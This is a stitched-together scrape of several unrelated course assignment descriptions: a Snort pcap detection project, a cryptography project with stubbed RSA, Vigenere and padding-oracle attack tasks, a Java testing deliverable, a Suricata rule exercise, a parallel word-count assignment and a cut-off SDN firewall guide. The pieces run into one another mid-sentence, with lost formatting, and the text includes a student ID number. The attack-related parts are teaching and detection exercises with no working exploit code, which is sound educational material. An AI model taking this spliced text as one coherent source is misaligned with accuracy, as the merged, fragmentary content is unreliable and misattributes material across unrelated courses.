DDoS, attackers usually keep making full TCP/UDP connections to the remote server. They keep the connection open by sending valid HTTP requests to the server at regular intervals but also keep the sockets from closing. Since any given Web server has a finite ability to serve connections, it will only be a matter of time before all its sockets are used up and no other connections can be made. Your need to identify which one of the following DDoS variants is present in the evaluation pcap: We will not be providing a sample pcap for ddos. Tips: An FTP/SSH attack is carried out by a Kali Linux machine (the attacker machine) against an Ubuntu 14.0 system (the victim machine). There is a large dictionary containing the 90 million words (potential passwords) used during the brute force attack. You will need to identify whether the evaluation pcap includes an FTP or SSH brute-force attempt. We will not be providing you with a sample pcap for SSH. However, we encourage you to do some research on the differences between FTP traffic and SSH traffic. Tips: Here is a 4 minute video that has some useful tips for Bruteforce attack. Similar to ddos, I recommend that you use 1 second as the time unit for this task if you use a detection filter. These attacks exploit vulnerabilities in web applications. Your need to identify which one of the following web attacks is present in your evaluation pcap: Tips: http_method; content “xxxxx”;http_uri; content “xxxxx” Botnets enable infected machines to communicate with command-and-control (C2) servers. You need to identify which botnet is present in your evaluation pcap: The sample pcaps we provided should be sufficient to guide you through this part of the project. Tips: For each type of traffic mentioned above, we provide a sample of that category/type of traffic. These samples are only for illustration purposes. These samples are only examples, and they are not the same as the actual traffic that is included in the evaluation pcap, which the students will need to label. For this exercise, we assume normal traffic to include HTTP, DNS. An example of normal (attack free) traffic can be found below:The host generates this traffic explicitly to communicate with a C&C server. The host communicates with the C&C server to receive commands, updates, etc. https://cs6262netsec.s3.us-east-1.amazonaws.com/CS6262-Ubuntu24.04-ARM.ovahttps://www.dropbox.com/scl/fo/wrjzmz31239hjl89dqsyh/AM-Rm6ndzbNoVjfCb4QHGwY?rlkey=ca03dmmltse78zrr7moz0t2rl&st=r1q6c64j&dl=0 The goals: Step by Step Instructions towards the goals: It can take up to 10 mins to boot up sometimes, but once you login, it should be smooth. Please follow the following instructions to set up snort: Project 4 VM instructions Use the attack descriptions above to understand how these attacks appear in network traffic. This is a graduate-level class, students are expected to research the documentation and learn filter-specific details on their own. We have some useful links at the end of the write up.Example: If detecting an SSH brute-force attack, use:Notes: Incorrect alert messages may result in point deductions. We do not limit the amount of rules you use, but you should be able to complete the project with 4-8 rules. Please see Project 4 VM instructions on how to run snort rules Submit the following Two files on Gradescope Your Snort rules file will be evaluated using an autograder based on four attack categories: Statistics for each type of unique connections (Important!): student@cs6262:~/Desktop$ python3 cal_unique_connection_2022.py alert_json.txtAttack type: WebAttack, unique connections: 134Attack type: Bruteforce, unique connections: 6975Attack type: DdoS, unique connections: 625Attack type: Botnet, unique connections: 47621Comments: set() (The number might be a little different when you try to find it in Wireshark. Use the number that Snort gives you) We consider a connection to be “src_ip:src_port:dest_ip:dest_port”.Follow the instructions we provided and run python3 to check the unique connections of your alert_json.txt and generate the results in `connections.txt`. If your alert JSON file is generated in the home directory, you might need to add sudo in front of your command. – No, we don’t, since similar projects run across semesters. – You can ignore ICMP & IP – Yes. If the VM is too slow for you, I would recommend you install pcap reading tools on your local machine and use the VM only for Snort. ‘evaluation.pcap’ is a very large file so it can take some time to load. You may need to increase the amount of RAM available to the system to get it to display properly. – Correct, you can complete without the VM but make sure your snort file works with the version installed in the given VM. (Snort 3)– A “Connection” is identified by its Source Address, Destination Address, Source Port, and Destination Port. – You may want to look at packets within a certain time frame. – It can be from any number of machines. The exact number is not relevant. – Only IPV4– No, you just need to submit the two files separately: rules.py and connections.txt. – We can’t confirm or deny. 🙂The sample pcaps are there to give you a good idea, but we don’t claim they’re representative. You should learn the pattern in the sample pcap and try to find related or similar patterns in the evaluation pcap. Always manually verify that what you find is correct. – Yes that means your json file is too big and maybe you need to put more constraints on your snort rule to generate a smaller json file. Readings on botnets behavior: Please read through the following papers, to get an understanding of what a bot is, and how botnets behave. Please note that we are not asking you to implement the proposed methodologies, e.g. a machine learning method to detect bots. Snort resources: Here you can find some examples of Snort rules, and some resources so that you get familiar with Snort rules. The purpose of these resources is only to get you familiar with how Snort rules look like. You are expected to write your own Snort rules.When you google snort syntax, you should be aware that we are using snort 3 not snort 2. There are some subtle differences between Snort 2 and Snort 3 syntax. Snort 2 syntax might result in errors when you run your rules locally. Example: Writing Snort rules to detect DDoS traffic: This is an example to give you an idea about how we can use our understanding of an attack, and write Snort rules with potentially long shelf life, to detect this attack. Intro reading for dos: https://en.wikipedia.org/wiki/Denial-of-service_attack. Snort for DDoS: Please read this to get a general idea about how Snort can be used for this purpose. Please focus on sections 3 and 4. After reading the above, one way to detect dos traffic is to monitor the rate of incoming traffic. Here is an example Snort rule based on traffic rate: http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node35.html (Notice that this link is actually the snort 2 manual. However, the syntax for detection_filter is the same in snort 2 and 3. The Snort 2 manual in this case provides a better example to illustrate this filter. For other filters, especially the URL content filters, you should double check the snort 3 manual and other resources online) Useful tools/commands: We do recommend you to install Wireshark on your own machine for evaluation pcap analysis because the pcap file is big and your VM might be significantly slower than your laptop. (optional reading) Subnet: Because it uses CIDR notation. CIDR and subnetting are virtually the same thing.CIDR is Classless inter-domain routing. It is the /number representation. In this case, we have /16/16 represents the subnet mask of 255.255.0.0 If you convert 255.255.0.0 into binary, you will see 16 1’s and that’s where the number 16 comes from.Of course, I can’t remember all those conversions for all netmask. There is a cheat sheet:Wait, what’s a subnet mask?Feel free to read this link if you want to know more:https://avinetworks.com/glossary/subnet-mask/The experimental data in this project were generated using the CSE-CIC-IDS2018 dataset, available via the AWS Open Data Registry (https://registry.opendata.aws/cse-cic-ids2018/). Disclaimer for background traffic. Please note that the traffic that is found in the evaluation pcap, and/or at the Sample pcaps is not generated by us. The dataset closely resembles realist traffic. Part of this traffic might contain inappropriate content or language. We have taken extra measures and we have performed considerable effort to filter all traffic, based on commonly used inappropriate words. We have filtered the http payload and URIs. Nevertheless, it might still be possible that some inappropriate content or words might have not been filtered entirely. In case you locate such content, we are letting you know that it is not intentional, and we are not responsible for it. Also, to complete this assignment, you do not need (nor do we ask you) to click on URLs found inside http payloads. Additional tools are not allowed. For the assignment, you are not allowed to use any available tools, related to Snort or others. For example, you are not allowed to use Snort preprocessors that may be publicly available, pre-compiled Snort rules, detection tools. etc. You are expected to write your own Snort rules. Limited support for running snort locally. We have the env set up for you inside the VM. Setting up the snort 3 env on your own could be troublesome. We strongly recommend you to run snort rules inside the VM we provide (you can analyze(use wireshark) the pcap outside the VM but run the rules inside the VM).
File from CanvasFile – project_cryptography.zip is attached with the project. CryptographyGoals of the Project For StudentsInformationThere is no required VM for this project. All that is required is a Python development environment. Make certain that you are using Python 3. To check your version of Python, open a command prompt and run the command:python –version (You may need to use the python3 command instead.)For the established algorithms that you may find it necessary to use, you are allowed to reference and implement pseudocode with citation (a comment in your code will suffice). What is Pseudocode? https://en.wikipedia.org/wiki/PseudocodeUNDER NO CIRCUMSTANCES should you copy/paste code into the project. Doing so is an honor code violation (not to mention a real world security concern) and will result in a zero (refer to the syllabus for more information).The Final DeliverablesYou will complete the provided Python file project_cryptography.py and submit it to the autograder in Gradescope.Open DiscussionsFor each task we have provided prompts for further discussions. There will be threads created in Ed where students can discuss these topics. Participation is optional and will not be graded.Good luck!Table of contents Project FilesYou can download project files in Canvas/Assignments/Cryptography.Important Notes:Provided Code:All necessary starter code and unit tests for each task is located in the corresponding folder in the provided zip file.Python Packages:pip install pycryptodomeUnit Tests:For each task you are also given a unit test file (it starts with test_)to help you develop and test your code. We encourage you to read up on Python unit tests, but in general, the syntax should resemble either:python -m unittest test_task_rsa_encrypt_messageor:python test_task_rsa_encrypt_message.pyHowever, keep in mind that passing the unit test(s) does NOT guarantee that your code will pass the autograder!Autograder:The autograder will timeout after 10 minutes. If your implementation is timing out, then there is very likely something wrong with your implementation. It is possible to solve each task in a few seconds. We encourage you to test locally to avoid unnecessary submissions.Gradescope can get very busy and even potentially unavailable near submission deadlines. Please do not wait until the last minute to make your submissions to the autograder. Submit early and often. There will be no late submissions accepted, as per the syllabus. Frequently Asked Question(s) (FAQ)Q: Some algorithms that can be used for this project have Python code implementations that I found on the Internet. Can I use that python code?Q: I’m worried that my implementation of an algorithm is going to fail a plagiarism check. Python syntax is a lot like pseudocode after all….Q: What is MOSS?Q: Can I discuss the algorithms with my classmates in Ed Discussions?Q: Do I need to convert from HEX to INT?Q: Where is this skeleton code you speak of?Q: Do I need to read the paper for the RSA Weak Key Attack?Q: Can I include print statements, will this mess up the autograder?Q: Can I include comments in my program?Q: Oh, I need to cite pseudocode?Q: Where?Q: What setup do you recommend for this project?Q: Speaking of VMs, do we need a VM for this project?Q: How do I know which algorithms to use?Q: I’m getting an error like the following shown below. How do I fix it?msg = bytes.fromhex(hex(m).rstrip(‘L’)[2:]).decode(‘UTF-8’) UnicodeDecodeError: ‘utf-8’ codec can’t decode byte 0xb7 in position 0: invalid start byteQ: If I post my code will you tell me why it isn’t working?Q: Can you provide more test cases? I pass locally but not in the autograder.Q: Can students share test cases?Q: Can I import other libraries?Q: I see that there are two different totient functions – Carmichael’s totient and Euler’s totient. Which one should I use? Task 1 – Vigenere Ciphers (30 points)The Vigenere cipher is an example of a symmetric key cryptographic algorithm. In such a system, a single key is used to both encrypt and decrypt messages (this is what makes it symmetric). The first step for both encryption and decryption is to build a Vignere square like the one pictured below. In each row of the Vigenere square, the letters of the alphabet are shifted to the left by one. The second step is to extend the key to match the length of the cipher/message by repeating it, taking care to remove any spaces or punctuation from the original message. For example, if our message is GEORGIA and our key is TECH we would end up with a key TECHTEC.To encrypt a message, we lookup each letter of the message as a row, and find its intersection with the column whose label contains the corresponding letter from the key. Using our GEORGIA/TECH example, the intersection of the first letter of the message G with the first letter of the key T is Z. Going letter-by-letter in this manner we build our cipher until we get ZIQYZMC.To decrypt a cipher, we start with the first letter of the key and traverse that row until we reach the corresponding letter from the cipher. The label of this column is our decrypted letter. Using our same GEORGIA/TECH example, to decrypt the cipher we would start with the first letter of our key T and traverse that row until we reached the first letter of the cipher Z. The label of this column is G – the first letter in our message.Vigenere Square [source: Wikipedia]Armed with this information, the first two parts of this task will ask you to write the necessary code to handle the encryption and decryption functionality for a Vigenere cipher system.For the third and final part, you will attempt to crack a Vigenere cipher using a dictionary attack. Ordinary words can make convenient keys because they are easy to remember, but this practice is far from secure. For this task, you are given a cipher and a list of some of the most common words in the English language. One of those words was used as the key to encrypt the cipher, and your job is to write the code to figure out which one it is. For simplicity, you can assume that all words in the original message are also chosen from the provided list of dictionary words.def vigenere_decrypt_cipher(c: str, keyword: str) -> str:# TODO: Write the necessary code to get the message (m) from the cipher ©# using the keywordm = ”return m def vigenere_encrypt_message(m: str, keyword: str) -> str:# TODO: Write the necessary code to create a Vigenere cipher (c) of the# message (m) using the provided keywordc = ”return c def vigenere_dictionary_attack(c: str) -> str:# TODO: Write the necessary code to get the message (m) from the cipher (c)m = ”return mSubmission DetailsYou will write your code in the specified function stub(s) found in the provided project_cryptography.py file. When ready, submit this file to the Project Cryptography autograder in Gradescope.Open DiscussionThe Vigenere cipher improves upon the ancient Caesar cipher. Mathematically speaking, how much more complexity does it add and how does it accomplish this? What are some ways that one could add more complexity/security to the Vigenere cipher system? Task 2 – RSA Warmup (7.5 points)Now that we’ve reviewed a symmetric key cryptographic algorithm, we can move on to the world of asymmetric key cryptography. RSA is perhaps the best known example of asymmetric cryptography. In RSA, the public key is a pair of integers (N, e), and the private key is an integer d.To encrypt integer m with public key (N, e), we use the formula:To decrypt cipher integer c with private key d, we use the formulaIn this task you will write the code to perform the encryption and decryption steps for the RSA cryptographic algorithm. Finally, you will write the code necessary to calculate the private key d when given the factors of the public key N (i.e. p and q).def rsa_decrypt_cipher(n: int, d: int, c: int) -> int:# TODO: Write the necessary code to get the message (m) from the cipher (c)m = 0return m def rsa_encrypt_message(m: int, e: int, n: int) -> int:# TODO: Write the necessary code to get the cipher (c) from the message (m)c = 0return c def rsa_calculate_private_key(e: int, p: int, q: int) -> int:# TODO: Write the necessary code to get the private key d from# the public exponent e and the factors p and qd = 0return dSubmission DetailsYou will write your code in the specified function stub(s) found in the provided project_cryptography.py file. When ready, submit this file to the Project Cryptography autograder in Gradescope.Open DiscussionDid you try to decrypt a cipher by using a line of Python code something like this: m = c ** d % n? Did it work? (Hint: It did not.) Why not? After all, the math is correct.Task 3 – RSA Factor A 64-Bit Key (10 points)Modern day RSA keys are sufficiently large that it is impossible for attackers to traverse the entire key space with limited resources. But in this task, you’re given a unique set of RSA public keys with a relatively small key size (64 bits).Your goal is to get the factors (p and q) of each key. You can use whatever methodology you want. Your only deliverable is a formatted json file containing p and q. To get your unique set of keys, you must update the task.py file located in the task folder with your 9-digit GT ID, and then run it. Find the section below in the provided task_factor_64_bit_key.py file:############################################### Change this to your 9-digit Georgia Tech ID!STUDENT_ID = ‘123456789’##############################################Running the command “python task_factor_64_bit_key.py” should output your assigned keys. Once you’ve calculated your p and q values, enter them into the function stub for this task. NOTE: It doesn’t matter which value you specify as p and which value you specify as q.def rsa_factor_64_bit_key() -> typing.Dict[str, typing.Dict[str, int]]:return {‘test_1’: {‘p’: 0,‘q’: 1},‘test_2’: {‘p’: 0,‘q’: 1},‘test_3’: {‘p’: 0,‘q’: 1},‘test_4’: {‘p’: 0,‘q’: 1},‘test_5’: {‘p’: 0,‘q’: 1}}Submission DetailsYou will write your code in the specified function stub(s) found in the provided project_cryptography.py file. When ready, submit this file to the Project Cryptography autograder in Gradescope.Open DiscussionIf 64-bit keys aren’t safe, then what size is appropriate? Is there a trade-off between size and performance? Task 4 – RSA Weak Key Attack (15 Points)Read the paper “Mining Your Ps and Qs: Detection of Widespread Weak Keys in Network Devices”, which can be found at: https://factorable.net/weakkeys12.extended.pdf. The essay is essential to understanding this task. Do not skip it, do not skim it, read the whole of it.You are given a unique RSA public key, but the RNG (random number generator) used in the key generation suffers from a vulnerability described in the paper above. In addition, you are given a list of public keys that were generated by the same RNG on the same system. Your goal is to write the code to get the unique private key (d) from your given public key (N, e) using only this provided information.def rsa_weak_key_attack(given_public_key_N: int, given_public_key_e: int, public_key_list: typing.List[int]) -> int:# TODO: Write the necessary code to retrieve the private key d from the given public# key (N, e) using only the list of public keys generated using the same flawed RNGd = 0return dSubmission DetailsYou will write your code in the specified function stub(s) found in the provided project_cryptography.py file. When ready, submit this file to the Project Cryptography autograder in Gradescope.Open DiscussionHave you ever heard the saying, “Never roll your own crypto?” What are some ways (besides this particular attack – we don’t want you to give too much away) that doing so can cause unintended problems? Can you point to any specific examples or known exploits? Task 5 – RSA Broadcast Attack (15 Points)A message was encrypted with three different 1,024-bit RSA public keys N_1, N_2, and N_3, resulting in three different ciphers c_1, c_2, and c_3. All of them have the same public exponent e = 3.You are given the three pairs of public keys and associated ciphers. Your job is to write the code to recover the original message.def rsa_broadcast_attack(N_1: int, c_1: int, N_2: int, c_2: int, N_3: int, c_3: int) -> int:# TODO: Write the necessary code to retrieve the decrypted message# (m) using three different ciphers (c_1, c_2, and c_3) created# using three different public key N’s (N_1, N_2, and N_3) m = 0 return mSubmission DetailsYou will write your code in the specified function stub(s) found in the provided project_cryptography.py file. When ready, submit this file to the Project Cryptography autograder in Gradescope.Open DiscussionIn addition to the low public exponent being used, this attack is possible because a textbook implementation of RSA is being used. In the real world, there are common mitigating tactics used. What are some examples? Why else are they important? Task 6 – RSA Parity Oracle Attack (15 Points)By now you have seen that RSA treats messages and ciphers as ordinary integers. This means that you can perform arbitrary math with them. And in certain situations a resourceful hacker can use this to his or her advantage. This task demonstrates one of those situations.Along with an encrypted message (c), you are given a special function that you can call – a parity oracle. This function will accept any integer value that you send to it and decrypt it with the private key corresponding to the public key that was used to encrypt the given cipher (c). The return value of the function will indicate whether this decrypted value is even (true) or odd (false). Armed with this function and a little modular arithmetic, it is possible to crack the encrypted message. Your goal is to write the code necessary to decrypt the original message (m) from the given cipher (c).def rsa_parity_oracle_attack(c: int, N: int, e: int, oracle: Callable[[int], bool]) -> str:# TODO: Write the necessary code to get the plaintext message# from the cipher (c) using the public key (N, e) and an oracle# function – oracle(chosen_c) that will give you the parity# of the decrypted value of a chosen cipher#(chosen_c) value using the hidden private key (d) m = 42 # Transform the integer value of the message into a human readable formmessage = bytes.fromhex(hex(int(m_int)).rstrip(‘L’)[2:]).decode(‘utf-8’) return messageSubmission DetailsYou will write your code in the specified function stub(s) found in the provided project_cryptography.py file. When ready, submit this file to the Project Cryptography autograder in Gradescope.Open DiscussionThis task is a simplified example, but can you see how some potentially useful information may be inadvertently leaked by something (i.e. a protocol)? Can you find any examples? Task 7: Task CBC Padding Oracle (7.5 Points)The Advanced Encryption Standard (AES) is a set of standards for encryption set by the U.S. National Institute of Standards and Technology. One of these standards is the Cipher Block Chaining (CBC). CBC uses a fixed length set of bits known as a block, a unique binary sequence known as an Initialization Vector (IV), and a key. The encryption is accomplished in the following sequence.The chaining part comes into play when encrypting multiple blocks. When working on the next block you follow similar steps with one main difference.The formula is as follows:Decryption works in reverse.The formula is as follows:For this task we will be working with an attack known as the padding oracle attack. The padding oracle works under the idea that the server is leaking information about the padding. With this information it is possible to both decrypt and encrypt messages.For this one section of the assignment you will be asked to use a library outside of the standard. In this task you will use the pycryptodome library. This can be manually downloaded from this link https://github.com/Legrandin/pycryptodome. Alternatively it can be downloaded through pip with the following command:pip install pycryptodomeThis task will be the only outside library used.The first 2 steps will be using a simplified version of padding. In a real world application blocks will be in bits and will typically use x00 or something similar depending on what standard is being used.Step 1 of this task is to write a function that can encrypt a short message. You may use pycryptodome’s built in encrypt function, however you must build the padding yourself.def cbc_encrypt_128(key: bytes, IV: bytes, m: str) -> str:# TODO: Write the necessary code to encrypt the message# (m) using the provided key and IV# the necessary block length is 128 bits# pad with the byte ‘x00’# Do Not modify code above this line# Code Below Herec = 0return b64encode(c).decode(“utf-8”)Step 2 of this task is to write a function that can decrypt a short message. You may use pycryptodome’s built in decrypt function.def cbc_decrypt_128(key: bytes, IV: bytes, c: bytes) -> str:# TODO: Write the necessary code to decrypt the cipher# (c) using the provided key and IV# Do Not modify code above this line# Code Below Herem = 0return mStep 3 of this task is to write one of the core functions of an oracle which will test if the padding follows pkcs guidelines. This check is often the information that the oracle can leak. For this task you must assume that there will always be at least 1 byte of padding, but there does not always have to be a message attached.def check_padding(padding) -> bool:# TODO: Write the necessary code to check# if the padding matches PKCS standardsis_pkcs_padded = “This variable should be a bool value” return is_pkcs_paddedThese steps can all be tested using the test_task_cbc_ python files. You can do so with the following commands:python test_task_cbc_decrypt.pypython test_task_cbc_encrypt.pypython test_task_cbc_pkcs.pyResourceshttps://en.wikipedia.org/wiki/Padding_oracle_attackhttps://www.pycryptodome.org/Submission DetailsYou will write your code in the specified function stub(s) found in the provided project_cryptography.py file. When ready, submit this file to the Project Cryptography autograder in Gradescope. Submission Instructions:My GTID: 903656183
This part of the document is provided to help you track where you are in the individual project. This section will be updated in future deliverables.ProvidedExpected ProvidedExpected Provided: TBDExpected: TBD Provided: TBDExpected: TBDIn this deliverable, we will assume that someone else in your company implemented the edittxt utility while you were creating test cases for it. For the sake of the assignment, we will also assume that your colleague is an infallible developer and produced a flawless implementation. Consequently, all the test cases you created for Deliverable 1 (D1) are supposed to pass on this implementation. To complete this deliverable, you will submit your test cases (i.e., class MyMainTest) and make sure that they pass on the reference implementation, which will be hidden from you. Gradescope will run them for you and report information about passing and failing tests. You may have to modify some of your tests, or add or delete tests from the tests submitted in D1. You will not be penalized for this, and you do not need to modify your category-partition files accordingly. Note that we are expecting the test class MyMainTest to be self-contained; that is, your tests should not rely on any external classes or resources.Your grade for this deliverable will be the average of three parts:Extra credit: If (1) all of your tests pass on the correct reference implementation, (2) your tests cover all of our representative scenarios, and (3) all of your tests fail on the faulty reference implementation, you will get 10 extra points, for a total of 110 points (for this deliverable). There is no partial credit for this assignment; you must meet all three previous requirements to get the extra credit for this deliverable.The tests you submitted for D1 should be able to pass all the checks and be graded, so it may be worth doing an initial submission right away, as a sanity check. Moreover, it could be the case that all of your test cases are already passing on the correct reference implementation, failing on the buggy reference implementation, and covering enough scenarios, in which case you would be done with the mandatory part of the deliverable.While the autograder provides details on which of your test cases fail on the reference code, it only reports the number of scenarios that your tests do not cover. To improve that part of your score, you will have to consider the program domain again and try to identify cases you may be missing. We cannot provide hints on what scenarios your test suite does not cover.Following are the steps to commit and submit this deliverable:javac -cp lib/* -d classes src/edu/gatech/seclass/edittxt/*.java test/edu/gatech/seclass/edittxt/*.java[1]java -cp classes:lib/* org.junit.platform.console.ConsoleLauncher –select-class edu.gatech.seclass.edittxt.MyMainTest[2] submission.txt As soon as you submit, Gradescope will grade your submission by:If any of the above steps fail, you will see a grade of 0 and an error message with some diagnostic information. Please note that, as before, if your submission does not pass the Gradescope checks, it will receive a 0. Conversely, if Gradescope can successfully compile and run your code and tests, you will immediately receive a grade that is your actual grade for this deliverable. Note that you can resubmit as many times as you want before the deadline.Unlike other assignments, this deliverable is not available to be submitted on Gradescope until the previous deliverable is due. That is, deliverable 2 will be available on Gradescope 48 hours after this assignment is released on Canvas.The test results you see in Gradescope tell you whether a given test passed or not. If the test didn’t pass, Gradescope should show the difference between the expected and actual output. As stated in the Grade section, Gradescope will show your score will be calculated based onStudent tests passing on CORRECT reference code: X/Ywhere X is the number of tests passing on the correct reference code and Y is the total number of tests you designed. All tests must pass on this implementation, so X should be equal to Y.Student tests passing on FAULTY reference code: Z/Ywhere Z is the number of tests passing on the faulty reference implementation and Y is the total number of tests you designed. All tests must fail on this implementation (since this implementation is incorrect), so Z should be 0.Coverage achieved: % (W/T)where W is the amount of scenarios your test suite uncovered, T is the total number of coverage scenarios we designed, and percentage achieved is the percentage representation of W/T.If you need clarifications on a specific test or Gradescope output, please post privately on Ed Discussion (if appropriate, we will make it public) and make sure to add, when applicable:The bottom line is that, to make the interaction efficient, you should make your posts as self-contained and easy-to-check as possible. The faster we can respond to the posts, the more students we can help. Although we tested the autograder, it may still handle some corner cases incorrectly. If you receive feedback that seems to be incorrect, please contact us on Ed Discussion using the approach we describe above. Answer: Yes, this shouldn’t result in an error and does not change any behavior. This will keep the lines containing the given substring “-i”. This happens because we parse first, so “-i” becomes the parameter for “-k”, just like any other string.Answer: Yes, you can update the catpart, although it will not be graded.Answer: We cannot reveal any of the scenarios tested against.[1] On some platforms, you may need to first create directory “classes”.[2] If using a Windows-based system, you may need to run java -cp “classes;lib/*” org.junit.platform.console.ConsoleLauncher –select-class edu.gatech.seclass.edittxt.MyMainTest
In each of these scenarios, come up with a Suricata signature that would match the traffic. Assume that HOME_NET, EXTERNAL_NET and HTTP_PORTS are correctly defined. Assume no other variables are defined. For each item write one rule and use the item number as the sid.1) You have been alerted that 27.43.100.29 is on a threat list as targeting web services. Write a signature that alerts on accesses from this host to any local web service.2) Your organization recently noticed that malicious actors were scanning for phpMyAdmin at “/phpMyAdmin/scripts/setup.php” on our web servers. The scan engine did not set a User-Agent. Write an alert for whenever an external host tries to fetch that URI without a User-Agent set. Test with http.pcapDownload http.pcap3) A few years ago a phishing attack was launched where the attacker got multiple users to add a malicious service as a trusted service on their Google account. The attack required the victim to click on a link to “https://accounts.google.com/o/oauth2/auth”. Write a signature that finds all email with a link to that address. Test with smtp.pcapDownload smtp.pcap4) [Extra credit] You are looking for data inside the friends lists on Yahoo! Messenger packets. The protocol is documented here: http://libyahoo2.sourceforge.net/ymsg-9.txt (Links to an external site.). Write a rule that will identify Yahoo messenger packets with a service of 00 f1 (this replaced YAHOO_SERVICE_LIST at some undocumented point in ancient history). You can test this against ymsg2.pcap Download ymsg2.pcap.Your submission is a text entry which should exactly match what would be stored in a rules file. You can test your rules at https://mzfrri3b1j.execute-api.us-east-1.amazonaws.com/ . Links to an external site. Please note that earlier sids can affect later sids (so if sid 1 matches all traffic it might make sid 4 not work). A well written submission should match all 3 (or 4) questions.Important Notes: Suricata Resources
Overview You have now completed various programming activities and lots of theory around how to design concurrent programs. Now it’s time to do a little 2-week design sprint (or Assignment #3). This assignment has been created to get you to think about parallel design and use some of the techniques and procedures discussed. There are a few “must have” requirements, but most of the design is up to you. The purpose of this assessment is to show the professor you have a solid understanding of the parallel processing concept.There is no right or wrong way to implement it. Except the use of sequential programming. That’s definitely wrong. You are being marked on the quality of your parallel solution not whether it works correctly or not.PART 1: Outline For this assignment you will be loading a large ASCII text file and performing some analysis on the content. No starting code is provided this time. It’s up to you to figure out and apply the skills you have learned over the past several weeks of class.Download the input ASCII text file from eConestoga (Hamlet.txt) and create a new Visual Studio solution and project for your design sprint.PART 2: Design and Implementation Your parallel application must implement the following analysis requirements:1. It shall count the number of occurrences for the following words (not case sensitive): a. Horatio b. and c. Hamlet d. GodNote: punctuation right after the word (for example: and, ) is still considered an occurrence of “and”.2. It shall count the total number of words in the file 3. It shall complete requirement #1 before it completes requirement #2 4. Requirement #2 shall be implemented using a Thread Pool concept 5. Your design must measure the following: a. Execution Time b. Latency c. Speedup d. Efficiency6. The output shall look as follows: x Horatio x and x Hamlet x God Total word count = xWhen you have completed your design run your application, take a screenshot of the console output and upload it to the box below.Log your measurement data here:Execution TimeStartup LatencySpeedupEfficiencyPART 3: Review of Design Now that you have completed your design and implementation, it is time to tell your professor all about your thought process. Answer the following questions in the text boxes below.(1) Provide a high level summary of your program. How do you load and manipulate the input data (for example). What concurrent/parallel techniques did you choose. Why?(2) In requirement #1 your threads needed to provide a result back to the master. What technique did you use? Why?(3) Explain your implementation for requirement #2 and #4. How did you handle the data? How many threads did you use? Why?(4) Requirement #3 stated you needed to perform the individual word counts before the full file word counts. How did you achieve this?Rubric See eConestoga for details. What to Hand In Once you have completed your assignment upload the following files INDIVIDUALLY to eConestoga using the submission link: • A copy of this completed PDF form • A ZIP file containing your entire solution space.Please make sure you delete all .vs (Hidden), release and debug directories before you compress and upload your solution.
SDN Firewall with POXTable of Contents SDN Firewall with POX Project…………………………………………………………………………………………………………. 2 Part 0: Project References…………………………………………………………………………………………………………….. 2 Part 1: Files Layout………………………………………………………………………………………………………………………. 3 Part 2: Mininet……………………………………………………………………………………………………………………………. 4 Part 3: Wireshark………………………………………………………………………………………………………………………… 4 Part 4: SDN Firewall Implementation Details…………………………………………………………………………………… 7 Part 4a: Specifications of configure.pol………………………………………………………………………………………. 7 Part 4b: Implementing the Firewall in Code……………………………………………………………………………… 10 Part 5: Configuration Rules………………………………………………………………………………………………………… 11 What to Turn In……………………………………………………………………………………………………………………………. 12 What you can and cannot share……………………………………………………………………………………………………… 12 Appendix A: How to Test Host Connectivity…………………………………………………………………………………….. 14 Part A: How to Test Manually………………………………………………………………………………………………….. 14 Part B: Automated Testing Suite……………………………………………………………………………………………… 17 Appendix B: Troubleshooting Information………………………………………………………………………………………. 18 General Coding Issues…………………………………………………………………………………………………………….. 18 Firewall Implementation (sdn-firewall.py) Errors and Issues………………………………………………………… 18 Mininet/Topology Issues…………………………………………………………………………………………………………. 18 Appendix C: POX API Excerpt…………………………………………………………………………………………………………. 19 Flow Modification Object……………………………………………………………………………………………………………. 19 Match Structure………………………………………………………………………………………………………………………… 19 OpenFlow Actions……………………………………………………………………………………………………………………… 21 Example: Sending a FlowMod Object…………………………………………………………………………………………… 22 Appendix D: Review of Mininet……………………………………………………………………………………………………… 24 In this project, you will use Software Defined Networking (SDN) principles to create a configurable firewall using an OpenFlow enabled Switch. The Software Defined Networking (OpenFlow) functionality allows you to programmatically control the flow of traffic on the network.This project has two phases (and one optional phase) as follows: You will find the following resources useful in completing this project. It is recommended that you review these resources before starting the project.There are a few videos describing various aspects of the project. Please refer to the Project Description for the current links to the different videos. These videos include: Unzip the SDNFirewall-Fall2025.zip file into your Virtual Machine. You can extract to any folder on your system. Do this by running the following command:First, please update the POX version installed on the VM to the latest branch by running the following:cd /home/mininet/pox git pull git checkout ichthyosaur chown -R mininet:mininet ~/pox Change to the folder where you stored your SDNFirewall-Fall2025.zip file and run the following command. This will extract the files for this project into a directory named SDNFirewall at your current path (it is recommended that your use the mininet root directory to aid in troubleshooting (cd ~ ). The following files will be extracted:This file will clean up the Mininet Environment and kill all zombie Python and POX processes.This file will create the appropriate POX framework and then integrates the rules implemented in sdn-firewall.py into the OpenFlow engine. It will also read in the values from the configure.pol file and validate that the entries are valid. If you make changes to this file, the autograder will likely have issues with your final code as the autograder uses the unaltered distribution version of this file.Project Deliverables If you did not complete the Simulating Networks Optional Project, you may want to review the “Mininet Review” section in Appendix D to learn about the different aspects of how a mininet network is setup, including how to configure the physical topology and assignment of addresses to hosts and switches. Wireshark is a network packet capture program that will allow you to capture a stream of network packets and examine them. Wireshark is used extensively to troubleshoot computer networks and in the field of information security. We will be using Wireshark to examine the packet headers to learn how to use this information to match traffic that will be affected by the firewall we are constructing.tshark is a command line version of Wireshark that we will be using to capture the packets between mininet hosts and we will use Wireshark for the GUI to examine these packets. However, you will be allowed to use the Wireshark GUI if you would like in doing the packet capture.Please watch the Wireshark Tutorial Video if you would like to follow along in time for a live packet capture. This topology matches the topology that you will be using when creating and testing your firewall. To start this topology, run the following command: This will startup a Mininet session with all hosts created. If you use sdn-topology.py, you will get a controller error. Ctrl-C and redo step 2 to get the correct topology. export PS1=”hostname >” replacing hostname with the actual hostname. Type in the following commands at the Mininet prompt. This is optional, but helps with identifying which xterm window belongs to which host. in the xterm window that pops up) in the second xterm window) This will start tshark and will output a pcap formatted file to packetcapture.pcap to the tmp directory. Note that this file is created as root, so you will need to change ownership to mininet to use it in future steps – chown mininet:mininet /tmp/packetcapture.pcap If you wish to use the Wireshark GUI instead of tshark, you would call us1 sudo wireshark &. You may use this method, but the TA staff will not provide support for any issues that may occur. YOU WILL SUBMIT THIS FILE AS A PART OF YOUR SUBMITTAL. in us1 xterm: (hit control C after a few ping requests) In us2 xterm: (likewise hit control C after a few ping requests) In us1 xterm: 0 In us2 xterm:After the connection completes, in the us1 xterm, press Control-C to kill theserver.In us1 xterm: 0 In us2 